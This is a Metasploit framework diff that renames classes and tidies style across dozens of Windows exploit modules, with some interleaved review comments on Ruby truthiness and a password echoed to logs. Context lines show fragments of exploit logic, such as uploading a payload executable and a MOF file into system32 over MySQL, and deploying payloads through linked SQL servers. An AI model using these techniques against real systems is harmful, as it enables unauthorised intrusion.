@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::MSSQL
diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb
index 91180f3205..4016a5c781 100644
--- a/modules/exploits/windows/mssql/ms02_056_hello.rb
+++ b/modules/exploits/windows/mssql/ms02_056_hello.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::MSSQL
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index fa9004658b..fda5bfcd30 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL @@ -377,7 +377,7 @@ exec sp_executesql @z| runme.gsub!(/%STUFF%/, enc) # go! - if (not mssql_login_datastore) + if !mssql_login_datastore fail_with(Failure::NoAccess, "Unable to log in!") end begin @@ -452,7 +452,7 @@ exec sp_executesql @z| return nil end - if (not logged_in) + if !logged_in fail_with(Failure::NoAccess, "Invalid SQL Server credentials") end res = mssql_query("select @@version", datastore['VERBOSE']) diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 320da58665..ebf8b5f23c 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index e9bc7580e0..f5ad07850b 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::MSSQL 
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', false]), OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), OptString.new('PASSWORD', [true, 'The password for the specified username']) ], self.class) @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check if credentials are correct print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...") - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("Invalid SQL Server credentials") print_status("-------------------------------------------------") return @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote } if masterList.length == 1 print_good("Successfully connected to #{server["name"]}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(server["name"],parse_results,true) elsif server["db_sysadmin"] == 1 print_good("Sysadmin on #{server["name"]}") @@ -185,7 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote write_to_report(name,server,parse_results,linked_server_table,link_status) # Display link server information in verbose mode - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(name,parse_results) print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") else @@ -219,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] # Display status to user - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] print_status(" ") print_error("Linked Server: #{name} ") print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") 
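Review bot: Replacing `datastore['VERBOSE'] == true` with a bare `datastore['VERBOSE']` in the `@@ -137,7 +137,7 @@`, `@@ -185,7 +185,7 @@` and `@@ -219,7 +219,7 @@` hunks (and again in the deploy-list hunk of this file) changes behaviour if the value is ever a string, because `'false'` is truthy in Ruby. The first hunk of this file corrects exactly that kind of value: the `DEPLOY` default that had been the string `'false'`. If the datastore always hands back a normalised boolean the change is safe, but that is not visible in these hunks. A short comment stating the assumption, or a check with the option explicitly set to false, would settle it.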
@@ -435,14 +435,14 @@ class Metasploit3 < Msf::Exploit::Remote if datastore['DEPLOYLIST']=="" datastore['DEPLOYLIST'] = nil end - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - Checking if #{name} is on the deploy list...") end if datastore['DEPLOYLIST'] != nil deploylist = datastore['DEPLOYLIST'].upcase.split(',') end if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is on the deploy list.") end unless shelled.include?(name) @@ -451,7 +451,7 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("Payload already deployed on #{name}") end - elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + elsif !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is not on the deploy list") end end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index d5ebe45d04..7fa63780fa 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - if (not mssql_login_datastore) + if !mssql_login_datastore vprint_status("Invalid SQL Server credentials") return Exploit::CheckCode::Detected end @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - if (not mssql_login_datastore) + if !mssql_login_datastore print_status("Invalid SQL Server credentials") return end 
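Review bot: The `@@ -435,14` hunk of mssql_linkcrawler.rb ends up with two nil-check styles side by side: the changed lines use `!datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"]`, while the untouched lines still read `if datastore['DEPLOYLIST'] != nil` and `if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase`. Converting those two as well, for example `if datastore['DEPLOYLIST'].nil? || deploylist.include?(name.upcase)`, keeps the block consistent and removes the low-precedence `or`. The surrounding method begins before the hunk.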
diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index 4ab1c8beb6..ae7a014bd5 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index f0147cad1f..b725efdf71 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL @@ -92,17 +92,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return if not m rescue RbMysql::AccessDeniedError - print_error("#{peer} - Access denied.") + print_error("Access denied.") return end if not is_windows? - print_error("#{peer} - Remote host isn't Windows.") + print_error("Remote host isn't Windows.") return end 
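Review bot: The status line at the top of `exploit` in mysql_mof.rb (hunk `@@ -92,17`) still interpolates `datastore['PASSWORD']`, so the database password is written in cleartext to the console and to any log or spool file that captures module output. The same line is carried over in the `@@ -102,7` hunk of mysql_start_up.rb. Printing only the account name is enough for the status message, for example `print_status("Attempting to login as '#{datastore['USERNAME']}'")`. The method continues past the end of this hunk.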
@@ -110,24 +110,24 @@ class Metasploit3 < Msf::Exploit::Remote exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:/windows/system32/#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) register_file_for_cleanup("#{exe_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. I blame kc :-)") + print_error("No permission to write. I blame kc :-)") return end mof_name = Rex::Text::rand_text_alpha(5) + ".mof" dest = "#{drive}:/windows/system32/wbem/mof/#{mof_name}" mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(mof, dest) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. Bail!") + print_error("No permission to write. Bail!") return end end diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index 46db38c85c..ec4908d59a 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 29a09fcac5..e327a41670 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL 
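Review bot: In the `@@ -110,24` hunk of mysql_mof.rb the context line `register_file_for_cleanup("#{exe_name}")` wraps a value that is already a String in an interpolation that does nothing. `register_file_for_cleanup(exe_name)` says the same thing and matches how `exe_name` is passed to `generate_mof` a few lines below. The method starts in the previous hunk.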
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") end - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) rescue RbMysql::AccessDeniedError diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index 8117dfec8f..b1f4985272 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 44eb354357..7eb98360a0 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index 0811a8ec5c..7f36adb06e 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index d1e2bd80c7..cf5ffbafb5 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index fd2883bd84..f804a1afeb 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -104,13 +104,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Generating VBS file...") mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs") - print_status("#{peer} - Uploading the VBS file") + print_status("Uploading the VBS file") worked = upload_file("WINDOWS\\system32\\#{@var_vbs_name}.vbs", vbs_content) unless worked fail_with(Failure::NotVulnerable, "Failed to upload the file") end - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") upload_file("WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof", mof_content) end 
@@ -132,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.include? "<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>" - print_warning("#{peer} - File successfully uploaded: #{filename}") + print_warning("File successfully uploaded: #{filename}") else - print_error("#{peer} - Failed to upload the file") + print_error("Failed to upload the file") return false end diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 212d81188d..d93490f75f 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index b437751a1a..47e020de48 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 36575b89bd..91b4b995b8 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp 
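Review bot: The success branch in the `@@ -132,9` hunk of file_reporter_fsfui_upload.rb reports through `print_warning`, which reads as a problem in the output even though the upload succeeded. Unless the warning level is deliberate (the hunk does not show a reason), `print_good("File successfully uploaded: #{filename}")` matches how the other modules touched by this commit report success. The method starts before the hunk and its return value on success is not visible here.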
diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index 8899a87ccf..9b12cc218e 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb index 08817cddeb..98e16a76dc 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb index 911d0683cf..5577884048 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb index bbc14601ec..bfc3cdb83d 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb index f4930191b4..bd7318ef14 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb index b305977fbb..d018f07b73 100644 --- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb +++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] } diff --git a/modules/exploits/windows/oracle/extjob.rb b/modules/exploits/windows/oracle/extjob.rb index 7af245692f..1ce2930169 100644 --- a/modules/exploits/windows/oracle/extjob.rb +++ b/modules/exploits/windows/oracle/extjob.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index bd720f2aee..e37b98a008 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::NDMP 
diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 8d33b8642c..f59db5a41d 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 228927ad94..21d7fc7fb5 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 5dcf583fc3..4b7cd04159 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 2cd1ccf651..2c04639fb6 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 9fd971c9e6..32cfb0c1b9 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb 
+++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index 623accfec0..13711e0958 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] } diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index bae54e50bb..1b8875b4e9 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 7dc8d3caef..2006bd8b07 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 25e75addc9..104269200b 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb index cdb7cdb0d7..467bb0092f 100644 --- a/modules/exploits/windows/scada/abb_wserver_exec.rb +++ b/modules/exploits/windows/scada/abb_wserver_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index 096e470c38..988432dd45 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb index 709c87917f..995fd79dd9 100644 --- a/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb +++ b/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb index 48a22d1afb..c9232eafd6 100644 --- a/modules/exploits/windows/scada/codesys_web_server.rb +++ b/modules/exploits/windows/scada/codesys_web_server.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Payload' => diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index bf791cc5d9..dc3b814a0a 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/factorylink_csservice.rb b/modules/exploits/windows/scada/factorylink_csservice.rb index d9ccff31a2..9a8f17a1e5 100644 --- a/modules/exploits/windows/scada/factorylink_csservice.rb +++ b/modules/exploits/windows/scada/factorylink_csservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index 01c93d561f..06edd9cdc4 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 5b423dfa65..2a81e8b6db 100644 
